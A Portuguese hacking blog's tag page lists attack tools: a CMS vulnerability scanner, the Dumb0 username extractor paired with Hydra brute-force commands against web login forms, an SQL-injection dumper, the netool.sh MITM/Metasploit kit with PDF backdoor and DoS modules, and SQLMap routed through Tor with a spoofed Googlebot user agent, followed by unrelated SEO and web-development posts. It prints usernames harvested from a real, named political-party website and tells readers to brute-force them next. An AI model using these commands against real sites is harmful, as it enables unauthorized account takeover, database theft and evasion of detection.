Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador ferramentas. Mostrar todas as postagens
Mostrando postagens com marcador ferramentas. Mostrar todas as postagens

sábado, 4 de outubro de 2014

CMS Based

CMS Bas3d é um scanner para CMSs, o objetivo desta ferramenta é analisar o alvo e procurar por possíveis vulnerabilidades que tenham sido publicadas pelo 1337day, exploit-db ou cxsecurity.

A ferramenta não faz uma vasta varredura no alvo, apenas pega a "source html" e 'trabalha com o que encontra', sendo assim, se a tool verificar que o alvo roda WordPress 2.8.5, a mesma irá lhe indicar os links das vulnerabilidades/exploits que PODEM funcionar com esta versão do WordPress.

Além de realizar este scan, você também tem a opção de verificar qual CMS esta rodando no alvo.

Abaixo esta a lista de quais CMS estão disponíveis para scan e quais estão disponíveis para verificação:

O scan funciona com as seguintes CMSs:
 -Joomla
 -b2evolution
 -XOOPS
 -Moodle
 -SMF
 -PHP-Nuke
 -WORDPRESS
 -PostNuke
 -VBULLETIN
 -PHPBB
 -MYBB
 -DRUPAL
 -MODx
 -SilverStripe
 -Textpattern
 -Frog
 -AdaptCMS


O identificador de CMSs é capaz de identificar cerca de 40 CMSs diferentes, sendo elas:
 -Joomla
 -AdaptCMS
 -Apache Roller
 -XOOPS
 -Frog
 -openCMS
 -SMF
 -Textpattern
 -Ametys
 -WordPress
 -ATutor
 -eXo Platform
 -vBulletin
 -b2evolution
 -DSpace
 -phpBB
 -Moodle
 -DotCMS
 -MyBB
 -PHP-Nuke
 -Composite C1
 -Drupal
 -PostNuke
 -DotNetNuke
 -MODx
 -SilverStripe
 -mojoPortal
 -phpVibe
 -Umbraco
 -BEdita
 -Chevereto
 -CMSimple
 -CMSimple_XH
 -Concrete
 -Cotonti
 -Directus
 -DokuWiki
 -Dotclear
 -Magento
 -Geeklog
 -Plone

Para utilizar a ferramenta é simples, a baixo esta comandos que vocês podem utilizar:

Scan com o objetivo de encontrar vulnerabilidades:
  perl ./cmsbas3d.pl [website]


Scan para verificar qual CMS esta rodando:
  perl ./cmsbas3d.pl vcms [website]


Atualizar:
  perl ./cmsbas3d.pl update
 
 
Exibir ajuda:
  perl ./cmsbas3d.pl help


Você pode realizar o "download" mais rapidamente 'clonando' o projeto pelo terminal!
  git clone https://github.com/7mm5ll/CMS_Bas3d.git CMS_Bas3d
 

Nota: O script roda apenas no Linux!


Disponível em:
https://github.com/7mm5ll/CMS_Bas3d

segunda-feira, 23 de junho de 2014

[Dumb0] extração de usuários + HYDRA força bruta em formularios web


 [Dumb0] + HYDRA

 Dumb0 é uma ferramenta possibilita extrair usuários ativos de plataformas CMS mais populares.

baixar: git clone https://github.com/0verl0ad/Dumb0.git
projeto: https://github.com/0verl0ad/Dumb0/


CMS que podemos extrair:
            SMF        --         Simple Machine Forums
            IPB          --        Invision Power Board
            XEN        --        Xen Foro
            VB          --        vBulletin
            myBB     --
            useBB    --
            vanilla  --
            bbPress  --
            WP     --        WordPress
            SPIP     --        SPIP CMS
            DRUPAL   --        Drupal
            MOODLE      --        Moodle
            BEE     --        Beehive Forums
            FLUX     --        fluxBB
            FUD     --        FUDforum
            punBB     --
            ACM     --        AcmImBoard XD
            BURN     --        Burning Board
            COM     --        Community Servers
            deluxeBB --       
            fusionBB --
            JFORUM     --
            JITBIT      --        Jibit ASPNetForum
            JIVE     --        Jive Forums
            NEAR     --        Near Forums
            OVBB     --       
            TikiWiki --        TikiWiki CMS-Groupware
Usando:
 Dumb0 é uma ferramenta possibilita extrair usuários ativos de plataformas CMS mais populares.

Comando
Dumb0 ex:
perl dumb0.pl --url=[SEU_ALVO URL] --type=[CMS/FORUM ID] {OPTIONS: --log=[SESSION COOKIE] --file[FILENAME] }


Uma vez identificado o CMS-usuarios podemos direcionar um ataque de força bruta contra eles via hydra.
Usando Hydra:

hydra URL http-form-post "/Path/archivo.php:ParametroUser=^USER^&parametroPass=^PASS^:MSG QUE INDICA FALHA" -L seus_user.txt -P senhas.txt

Sintaxe simples fica assim :
 --------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:Usuario ou senha invalida"

--------------------------------------------------------------------------------
 Para criar esta sintaxe foi preciso : Valor do atributo action do
 <form> : logar.php Valor do atributo referente ao nome e senha de usuário nas tags <input> dentro do <form>: name , pass Mensagem de erro ou parte dela: "Usuário ou senha invalida" - O uso do caractere coringa é permitido : .*senha invalida - É possível usar uma mensagem de sucesso adicionando S= antes da mensagem :
 --------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f -w 15 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:S=Logado com sucesso"

--------------------------------------------------------------------------------


Exemplo de resultado Dumb0:
alvo:http://www.psdb-mg.org.br/

perl Dumb0.pl --type=WP --url='http://www.psdb-mg.org.br/' --file='ps.txt'

RESULTADO:

[!] Dumping users from http://www.psdb-mg.org.br/...

[+] Posible user found ~> admin &#8211; PSDB - MG
[+] Posible user found ~> psdb &#8211; PSDB - MG
[+] Posible user found ~> psdbjovem &#8211; PSDB - MG
[+] Posible user found ~> psdbmulher &#8211; PSDB - MG
[+] Posible user found ~> psdbsindical &#8211; PSDB - MG
[+] Posible user found ~> itv &#8211; PSDB - MG
[+] Posible user found ~> Alias &#8211; PSDB - MG
[+] Posible user found ~> tucanafro &#8211; PSDB - MG
[!] Work finished


Depois de terminado o scan de users, agora direcionar seu ataque de força bruta com Hydra.

REF:http://blog.0verl0ad.com/2014/02/dumb0pl-herramienta-para-extraer.html
REF:http://www.exploit-db.com/papers/18939/

Ferramenta Simple SQLi Dumper v5.1 - Tool

   Simple SQLi Dumper v5.1 - Tool 

   Simple SQLi Dumper v5.1 - Tool
Procura bugs,erros ou vulnerabilidades em aplicações que usem MySQL database.
Funções:
  1. SQL Injection,
  2. Operation System Function,
  3. Dump Database,
  4. Extract Database Schema,
  5. Search Columns Name,
  6. Read File (read only),
  7. Create File (read only),
  8. Brute Table & Column

Baixar:http://pastebin.com/ZGk5DKYa

terça-feira, 10 de junho de 2014

netool.sh V3.4 [ r00tsect0r module ]

netool.sh V3.4 
netool.sh é um script em bash para automatizar frameworks como Nmap, redes de deriva, sslstrip, Metasploit e Ettercap MITM ataques. esse script faz com que seja fácil, tarefas como SNIFFING tráfego TCP / UDP, ataques ManInTheMiddle, SSLsniff, falsificação de DNS, o outro módulos disponíveis são: recuperar metadados do site alvo, ataques DoS dentro da rede externa / local,também usa macchanger para chamariz scans, usa o nmap para procurar uma porta especificada aberto no externo / lan local, mudança / ver o seu endereço mac, mudar o meu PC hostname, também pode executar TCP / UDP pacotes manipulação usando etter.filters, também como a habilidade de capturar imagens de navegação na web-browser na máquina de destino sob ataque MITM e realiza uma varredura vuln ao web-site-alvo usando websecurify firefox-addon, também usos [msfpayload + + msfencode msfcli] para ter o controle remoto da máquina de destino, também veio com [root3.rb] meterpreter ruby ​​script de auxiliar, e um módulo para instalar / editar o script meterpreter e atualizar o banco de dados Metasploit automática, busca de alvos de geolocalização, ou use [webcrawler.py] módulo para procurar páginas de login de administrador, directorys site, webshells.php plantada no site, scanner vulns upload de arquivo comum [LFI] e procurar XSS sites vuln usando idiotas google, também usa um módulo para automatizado alguns ataques mais MITM (dns-paródia + metasploit + phishing, e uma colecção de (Metasploit) exploits automatizados ...

netool.sh é um script em bash para automatizar frameworks como Nmap, redes de deriva, sslstrip, Metasploit e Ettercap MITM ataques. esse script faz com que seja fácil, tarefas como SNIFFING tráfego TCP / UDP, ataques ManInTheMiddle, SSLsniff, falsificação de DNS, o outro módulos disponíveis são:
recuperar metadados do site alvo, ataques DoS dentro da rede externa / local,também usa macchanger para chamariz scans, usa o nmap para procurar uma porta especificada aberto no externo / lan local, mudança / ver o seu endereço mac, mudar o meu PC hostname, também pode
executar TCP / UDP pacotes manipulação usando etter.filters, também como a habilidade de capturar imagens de navegação na web-browser na máquina de destino sob ataque MITM e realiza uma varredura vuln ao web-site-alvo usando websecurify firefox-addon, também usos [msfpayload + + msfencode msfcli] para ter o controle remoto da máquina de destino, também
veio com [root3.rb] meterpreter ruby ​​script de auxiliar, e um módulo para instalar / editar o script meterpreter e atualizar o banco de dados Metasploit automática, busca de alvos de geolocalização, ou use [webcrawler.py] módulo para procurar páginas de login de administrador,
directorys site, webshells.php plantada no site, scanner vulns upload de arquivo comum [LFI] e procurar XSS sites vuln usando idiotas google, também usa um módulo para automatizado alguns ataques mais MITM (dns-paródia + metasploit + phishing, e uma colecção de
(Metasploit) exploits automatizados ...

Dependências
  1. Nmap
  2. Ettercap
  3. Macchanger
  4. Metasploit
  5. Driftnet
  6. Apache2
  7. Sslstrip
  8. Python-beautifulsoup

Neste vídeo tutorial, vamos ver o funcionamento acompanhamento módulos:
  1. Backdoor PDF (Adobe Reader no Windows XP SP3)
  2. FakeUpdate (windows universal)
  3. java.jar phishing (OSX maçã, Linux, Windows, BSD, Solaris com java em execução)
  4. java_applet attacj "clonar um site e injetar um Iframe que aponta para a nossa aplicação" (sistemas afetados são: Apple OSX, Linux, Windows, BSD, Solaris)
  5. Ataque RDP D0S (denial-of-service Agains um host de destino em execução RDP proto)
ChangeLog:
----------------------------------------­---------------------------------------------------------------­-----------------------
Interface de usuário renovada
'clear script output'
'linux hashdump.rb added'
'PDF backdoor added'

Phishing modules improved
'External IP addr display'
'post-exploitation modules added'
----------------------------------------­---------------------------------------------------------------­-----------------------



Página do projeto
http://sourceforge.net/projects/netoolsh/?source=directory

WIKI:
http://sourceforge.net/p/netoolsh/wiki/netool.sh%20script%20project/  



quinta-feira, 5 de dezembro de 2013

Liberado 'netool.sh V3.4' (estável)

netool.sh V3.4

---------------------------------------------------------------------------------------------------------
Liberado 'netool.sh V3.4' (estável)
---------------------------------------------------------------------------------------------------------


netool.sh é um script em bash para automatizar frameworks como Nmap , redes de deriva , sslstrip ,
Metasploit e Ettercap MITM ataques . esse script faz com que seja fácil, tarefas como
SNIFFING tráfego TCP / UDP, ataques ManInTheMiddle , SSLsniff , falsificação de DNS , o outro
módulos disponíveis são:

recuperar metadados do site alvo, ataques DoS dentro da rede externa / local ,
também usa macchanger para chamariz scans, usa o nmap para procurar uma porta especificada aberto
no externo / lan local, mudança / ver o seu endereço mac, mudar o meu PC hostname, também pode
executar TCP / UDP pacotes manipulação usando etter.filters , também como a habilidade de
capturar imagens de navegação na web -browser na máquina de destino sob ataque MITM e
realiza uma varredura vuln ao web-site -alvo usando websecurify firefox- addon , também
usos [ msfpayload + + msfencode msfcli ] para ter o controle remoto da máquina de destino, também
veio com [ root3.rb ] meterpreter ruby script de auxiliar, e um módulo para instalar / editar
o script meterpreter e atualizar o banco de dados Metasploit automática, busca de
alvos de geolocalização, ou use [ webcrawler.py ] módulo para procurar páginas de login de administrador ,
directorys site, webshells.php plantada no site , scanner vulns upload de arquivo comum
[ LFI ] e procurar XSS sites vuln usando (Dorks,Strings) do google , também usa um módulo para
automatizado alguns ataques mais MITM ( dns- paródia + metasploit + phishing, e uma coleção de
( Metasploit ) exploits automatizados.

Ping remote target or web domain
Show Local Connections (see my machine connections)
Show my Ip address and arp cache
see/change macaddress
change my PC hostname
Scan Local network (search for live hosts inside local network)
search in external lan for hosts
Scan remote host (using nmap to perform a scan to target machine)
execute Nmap command (direct from shell)
search for target geo-location
Open router config page
Ip tracer whois (open website database whois and geo-location)
WebCrawler (open websecurify webcrawler website)
DDoS java Script (perform DDoS attacks external network)
Retrieve metadata (from a web-domain)
Config ettercap (etter.conf))
Launch MITM (using ettercap to perform MITM)
show URLs visited (by target machine under MITM)
Sniff remote pics (by target machine under MITM)
sniff SSL-HTTPS logins
share files in local lan
Dns-Spoofing (redirect web-domains to another ip address)
DoS attack (local netwok)
Compile etter.filters
execute ettercap filter
webcrawler
post-exploitation auxiliary modules
r00tsect0r automated exploits
common user password profiler
d. Delete lock folders
a. about netool
q. quit

Vídeo (version 3.4)


---------------------------------------------------------------------------------------------------------
Confira as novidades
http://sourceforge.net/p/netoolsh/wiki/bug-fixes-release/

Confira o WIKI:
http://sourceforge.net/p/netoolsh/wiki/netool.sh%20script%20project/

Projeto:
http://sourceforge.net/projects/netoolsh/
---------------------------------------------------------------------------------------------------------

sexta-feira, 23 de novembro de 2012

Usando ferramenta SQLMap com o Tor

A Injeção de SQL, mais conhecida através do termo americano SQL Injection, é um tipo de ameaça de segurança que se aproveita de falhas em sistemas que interagem com bases de dados via SQL. A injeção de SQL ocorre quando o atacante consegue inserir uma série de instruções SQL dentro de uma consulta (query) através da manipulação das entradas de dados de uma aplicação. A alguns anos atrás quando essa ameaça foi descoberta, a forma de injeção era "na unha", digamos assim. O pentester tinha que inserir os códigos manualmente, demorando muito tempo para concluir o ataque. Foi então que começaram a desenvolver programas que automatizados. Hoje em dia talvez o mais conhecido desses programas seja o SQLMap. O SQLMap é um programa de teste de penetração de código aberto, escrito em Python. Ele tem suporte total aos sistemas de banco de dados: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB. Também tem suporte a 6 tipos de técnicas SQL Injection.  O foco desse post hoje é mostrar pra vocês como usar o SQLMap junto com o Tor, para proteção do IP, DNS, etc. No seu linux, digite no terminal:

Injeção de SQL, mais conhecida através do termo americano SQL Injection, é um tipo de ameaça de segurança que se aproveita de falhas em sistemas que interagem com bases de dados via SQL. A injeção de SQL ocorre quando o atacante consegue inserir uma série de instruções SQL dentro de uma consulta (query) através da manipulação das entradas de dados de uma aplicação.
A alguns anos atrás quando essa ameaça foi descoberta, a forma de injeção era "na unha", digamos assim. O pentester tinha que inserir os códigos manualmente, demorando muito tempo para concluir o ataque. Foi então que começaram a desenvolver programas que automatizados. Hoje em dia talvez o mais conhecido desses programas seja o SQLMap. O SQLMap é um programa de teste de penetração de código aberto, escrito em Python. Ele tem suporte total aos sistemas de banco de dados:Também tem suporte a 6 tipos de técnicas SQL Injection. MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB.

O foco desse post hoje é mostrar pra vocês como usar o SQLMap junto com o Tor, para proteção do IP, DNS, etc. No seu linux, digite no terminal:

$ sudo apt-get install tor tor-geoip

Depois disso, entre na pasta o SQLMap e digite:

./sqlmap.py -u "http://www.seusitevulneravel.com/index.php?cata_id=1" -b -a –tor --check-tor--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

O argumento --tor chama o Tor para ser usado e o --check-tor verifica se o Tor está sendo usado corretamente, caso não esteja, você vai receber uma mensagem de erro em vermelho no terminal. E o User Agent é do googlebot, todos os seus requests no site vão parecer como se fosse o bot do Google fazendo uma visitinha. :)

Por hoje é só, pessoal.

Abraços!

quarta-feira, 3 de outubro de 2012

Melhor criptografia para segurança de rede. Criptografar ou descriptografar dados sensíveis usando AES / DES / RCA codificadores (ferramentas de segurança).

Ferramentas online grátis para criptografar texto usando 128-bit AES / DES / RCA criptografia. Criptografar ou descriptografar o texto on-line com uma senha de sua escolha utilizando esta ferramenta mão. Este é o serviço para garantir suas mensagens de uma maneira fácil. CRYPO sistema irá criptografar a mensagem usando o algoritmo de criptografia forte, e vai ser seguro para o envio. Web baseada serviço online para texto fácil e criptografia de mensagens e proteção. CRYPO - Melhor criptografia para segurança de rede.


Ferramentas online grátis para criptografar texto usando 128-bit AES / DES / RCA criptografia. Criptografar ou descriptografar o texto on-line com uma senha de sua escolha utilizando esta ferramenta mão. Este é o serviço para garantir suas mensagens de uma maneira fácil. CRYPO sistema irá criptografar a mensagem usando o algoritmo de criptografia forte, e vai ser seguro para o envio. Web baseada serviço online para texto fácil e criptografia de mensagens e proteção. CRYPO - Melhor criptografia para segurança de rede.

Um site muito bom recomendo vários tipos de cripts.


Site: http://www.crypo.org/tools/index.php

sexta-feira, 31 de agosto de 2012

Script Teste SQL 1.0 Googleinurl - Brasil Sendmail

Script Teste SQL 1.0 Googleinurl - Brasil Sendmail

Script Teste SQL 1.0 Googleinurl - Brasil Sendmail
By: Cleiton Pinheiro.
Blog.inurl.com.br

GoogleINURL - Brasil pesquisa avançada

Pode ajuda ADM que desejam testar todas url do seu site só inseri-las  no textarea.
"As url previamente filtradas"
EX:
www.site.com.br/index.php?id=654654
www.site.com.br/main.php?id=6546548888
www.site.com.br/photos/all/open.php?cod=65

As url com erro seram enviadas para o email determinado na textbox.

Intuito do script é o estudo.

Script

segunda-feira, 27 de agosto de 2012

Statsgram: descubra informações de qualquer site da web.

Statsgram: descubra  informações de qualquer site da web.


Statsgram: descubra  informações de qualquer site da web.

Info referente: DNS,HTML,TAGS,VISITANTES,SCRIPTS e outros.

e você possui um site, blog ou apenas deseja pesquisar um pouco mais a respeito de algum endereço da web, o Statsgram te ajuda a obter diversas informações de uma maneira simples, rápida e gratuita. 
Trata-se de um serviço web que, em segundos, lhe dá várias estatísticas de um site ou blogapenas digitando a URL que você deseja pesquisar, sem qualquer tipo de registro prévio.
Quando você realiza uma pesquisa no Statsgram, um relatório é emitido com diversos dados, como, por exemplo, o número de visitantes por dia, local do servidor, um mapa que mostra a localização mundial dos visitantes da página, sites semelhantes etc. Detalhes um pouco mais profundos também são mostrados, como as buscas mais populares realizadas dentro do site, por exemplo.
Os números são estimados, portanto, podem não ser muito corretos às vezes. Mas, de qualquer maneira, não deixa de ser uma ferramenta interessante.

Acessar:http://statsgram.com


segunda-feira, 19 de março de 2012

WebMatrix Muito bom para WebDesigner que gosta de facilidade

WebMatrix 

The top features you'll love.

                                         http://www.microsoft.com/web/webmatrix/features.aspx 
O WebMatrix foi criado para simplificar e facilitar o desenvolvimento Web, quer você esteja começando ou apenas executando suas tarefas. Ele permite que você se concentre no que importa: o seu site. Este é um instantâneo de alguns dos grandes benefícios do WebMatrix. 

Um pacote pequeno, porém completo

O WebMatrix é uma ferramenta de desenvolvimento Web gratuita que leva apenas alguns minutos para ser instalada e reúne um servidor Web, um banco de dados e frameworks de programação em uma única experiência integrada. A ferramenta permite codificar, testar e implantar lado a lado aplicativos ASP.NET e PHP.

Cresce com você

Com o WebMatrix na sua estação de trabalho, você usa o mesmo servidor Web poderoso, o mesmo mecanismo de banco de dados e os mesmos frameworks que o seu site na Internet. Isso assegura uma transição de desenvolvimento para produção tranquila e direta.
Quando você estiver pronto, o WebMatrix irá integrar o Visual Studio ao seu fluxo de trabalho. Conecte-se ao Visual Studio para se beneficiar de recursos avançados como depuração e criação de perfis. Além disso, quando você estiver preparado para um servidor de banco de dados relacional de grande volume, mude seu banco de dados e os dados do SQL Server Compact para o SQL Server.

Publicação do site

Com o WebMatrix é possível encontrar o local perfeito para seu site. Use o WebMatrix para encontrar o provedor de hospedagem Web que se adeque aos seus requisitos e use o suporte à publicação interno para FTP, FTPS, e WebDeploy a fim de garantir que seus arquivos, bancos de dados e configurações cheguem intactas na Web.

Banco de dados simplificado

Nunca foi tão fácil usar um banco de dados! O WebMatrix inclui um pequeno banco de dados incorporado chamado SQL Server Compact, que pode residir com o código e o conteúdo do seu site. Use-o para começar a construir o seu próximo site e, quando estiver preparado para publicar, simplesmente copie o arquivo do banco de dados de seu computador para qualquer servidor Web, que ele irá executá-lo, sem necessidade de instalação extra. Outra opção é migrar facilmente o banco de dados e os dados para o SQL Server quando você estiver preparado para um alto volume de tráfego.

Interface elegante, experiência simples

O WebMatrix integra um editor de códigos sofisticado, um editor de bancos de dados, gerenciamento de servidor Web, SEO, publicação FTP, e mais; o WebMatrix fornece uma experiência de desenvolvimento de sites que une todos os principais componentes que você precisa para criar, executar e implantar o site.

Mais do que “Hello World”

Você quer exibir um feed do Twitter? Precisa apresentar um vídeo? O código ajuda a facilitar a execução de tarefas comuns com uma tag simples no seu HTML.

Iniciar > Software Livre

O WebMatrix conecta você a uma infinidade de aplicativos Web populares e de software livre, incluindo DotNetNuke, Umbraco, WordPress, Joomla! e muito mais. Simplesmente selecione um aplicativo da galeria interna e o WebMatrix realiza o download e a instalação do novo site. Os dias de edição manual de arquivos de configuração e de se certificar quanto a possuir todos os componentes certos acabaram há muito tempo. Personalize o site usando o editor de códigos interno e torne-o seu.

domingo, 30 de outubro de 2011

10 ferramentas de SEO feias, mas que são demais!

Aqui na SEOmoz temos orgulho de produzir belas ferramentas SEO que brilham, frequentemente com grande sucesso. Para sermos justos, nem sempre chegamos lá. Não se pode julgar um livro pela capa. Algumas das melhores ferramentas de SEO já inventadas nasceram em planilhas caseiras feitas no Google Docs por um nerd com dados diretos das API's, sem qualquer tratamento.
Adoramos ferramentas feias de SEO. Elas são práticas, e frequentemente feitas por um único desenvolvedor. Vamos distribuir essa adoração avaliando essas ferramentas com design que deixam a desejar, mas que na verdade são impressionantes.

01. Shared Count

Por que ela é demais: Introduzida por Tom Critchlow, o Shared Count tem um lugar definitivo na minha barra de favoritos. Ela não só rastreia as estatísticas de compartilhamento social de qualquer página que você deseje, como Facebook, LinkedIn, Google+ e Twitter. Adicionalmente, a Shared Count tem uma API aberta, de forma que você pode construir suas próprias ferramentas em cima dela.
10 ferramentas de SEO feias, mas que são demais!
Por que é feia: É difícil escolher uma ferramenta sem nenhum design. É como chutar cachorro morto.

02. IETester

Por que ela é demais: Sempre que você checa a compatibilidade através de browsers, em nove de dez vezes, o Internet Explorer o jogará em um loop. O  IETester é um browser que pode ser baixado gratuitamente e que permite fazer renderizar diferentes versões do IE em janelas lado a lado para checagem de erros. Há ainda uma opção bacana de debugging para eliminar problemas difíceis de encontrar.

Por que é feia: Nada aparece bem no IE6; nem mesmo o IE6.

03. Blogscape

Por que ela é demais: É a pérola oculta das ferramentas do SEOmoz.. Ela permite monitorar em uma base diária a popularidade de qualquer palavra-chave, marca ou URL. Simplesmente entre com um termo ou domínio e veja todas as vezes que foi mencionada, em  uma lista de milhares de RSS ou mais.
Alé disso, operadores de pesquisas avançados permitem rastrear somente posts que contenham um link para um domínio específico - ótimo para localizar a descoberta de novos links. Nós a usamos semanalmente aqui na SEOmoz para ajudar a medir o sucesso de nossos esforços.

Por que é feia: O screenshot acima não tem má aparência, mas toda vez que o logo neon do lobo verde carrega em um browser, Roger MozBot explode um circuito. (Esta é uma ferramenta PRO. Se você não for um membro PRO, a página de login é mais feia ainda).

04. URI valet

Por que ela é demais: o URI valet combina mais de 10 ferramentas estruturais em uma para fazer auditorias técnicas, revisões de sites além de outras coisas. Você pode ver por trás da cena de qualquer webpage checando os headers do servidor, proporção de texto e HTML, velocidade de download, detalhes de objetos e links rápidos para W3C Validators. Uma de minhas características favoritas é que essa ferramenta não só lista todos os links internos e externos de uma página, como também os valida.

Por que é feia: Quem disse que você precisa de um designer gráfico para fazer uma ferramenta baseada na web? Ou até uma paleta de cor?

5-6. Robots.txt Checkers

http://tool.motoricerca.info/robots-checker.phtml
http://www.frobee.com/robots-txt-check
Por que ela é demais: Não posso decidir qual dessas ferramentas gosto mais - é bom então assinalar as duas. Quando trabalhei no suporte da SEOmoz, essas ferramentas eram essenciais para descobrir problemas ocultos com arquivos robots.txt, mesmo quando não havia erros visíveis. Eles até reportam erros de codificação ocultos em seus arquivos que podem suplantar sua aranha de busca. Garanto que pelo menos um de cada cinco leitores encontrará erros em robots.txt dos quais nem mesmo desconfiavam.

Por que são feias: Sabemos que os arquivos robots.txt  são chatos (com exceções), mas sua interface com o usuário também precisa ser?

07. Wayback Machine

Por que ela é demais: O  Wayback Machine tem um arquivo gigante de páginas web de até 15 anos atrás. Se você desejar pesquisar links antigos, que possam ter desaparecido, ou queira rastrear modificações em websites que resultaram em mudanças de tráfego, a Wayback Machine permite olhar o passado, algumas vezes com resultados dramáticos.
Alguns SEOs compram domínios expirados, reconstroem o website previamente existente, página por página, com os arquivos da Machine. Eles esperam com isso preservar a alusão de continuidade para o Google. (Na minha opinião, ainda não há veredito).

Por que é feia: é legal ver como seu website favorito parecia em 1996, mas e aquele logo? Ainda em Beta?

08. SEO Browser

Por que ela é demais: permite ver rapidamente em uma página toda a sua estrutura SEO importante em um relance, começando como a tag do título e facilitando as coisas a seguir. A página tem um arquivo robots.txt? E analytics instalados? Frequentemente uso a barra de ferramentas SEO para obter informações rápidas sobre a estrutura da página, mas o browser SEO é um velho favorito, e ótimo quando quero ver todas as informações, o text copy inteiro, em uma única página legível.

Por que é feia: Sua tagline é “Veja seu website como um mecanismo de busca o vê”. Infelizmente, a maioria dos mecanismos de busca tem a estética de um arquivo CSV sem cores.

09. Rank Checker

Por que ela é demais: Algumas vezes você quer checar um monte de rankings, e quer fazer isso rápido. O Rank Checker do SEObook roda em seu browser, de forma que não é necessário esperar por um terceiro processamento para checar os rankings para você. Cautela, porque ele roda em seu browser e é muito mais difícil de ser controlado quanto aos efeitos de localização e outros fatores mitigadores, mas mesmo assim, é prático quando a rapidez é mais importante do que a precisão.
10 ferramentas de SEO feias, mas que são demais!
Por que é feia: não é tanto assim, mas é “rápida e suja”.

10. Xenu’s Link Sleuth

Por que ela é demais: Enquanto o Screaming Frog está ganhando as mentes e corações de muitos SEOs, o link Sleuth do Xenu ganha o prêmio do feioso mais original e que além de tudo, é ótimo! A maioria o considera um link checker que roda em seu desktop, mas sua interface simples e sua apresentação de resultados de fácil entendimento fazem com que ele seja obrigatório ao rodar auditorias rápidas em um site. Também é brilhante para garimpar oportunidades com links.
10 ferramentas de SEO feias, mas que são demais!
Por que é feia: depois de fazer uma pesquisa do Xenu no Google, a primeira coisa que você faz é pressionar o botão “back” para checar mais uma vez os seus resultados. Muito provavelmente essa é a pior página da história das ferramentas de SEOs, você vai praguejar porque chegou em um site quebrado de 1992. Mas acredite, está tudo certo com ela!

Este artigo é uma republicação feita com permissão. SEOMoz não tem qualquer afiliação com este site. O original está em
http://www.seomoz.org/blog/seo-tools-that-roc
http://imasters.com.br/artigo/22451/metricas/10-ferramentas-de-seo-feias-mas-que-sao-demais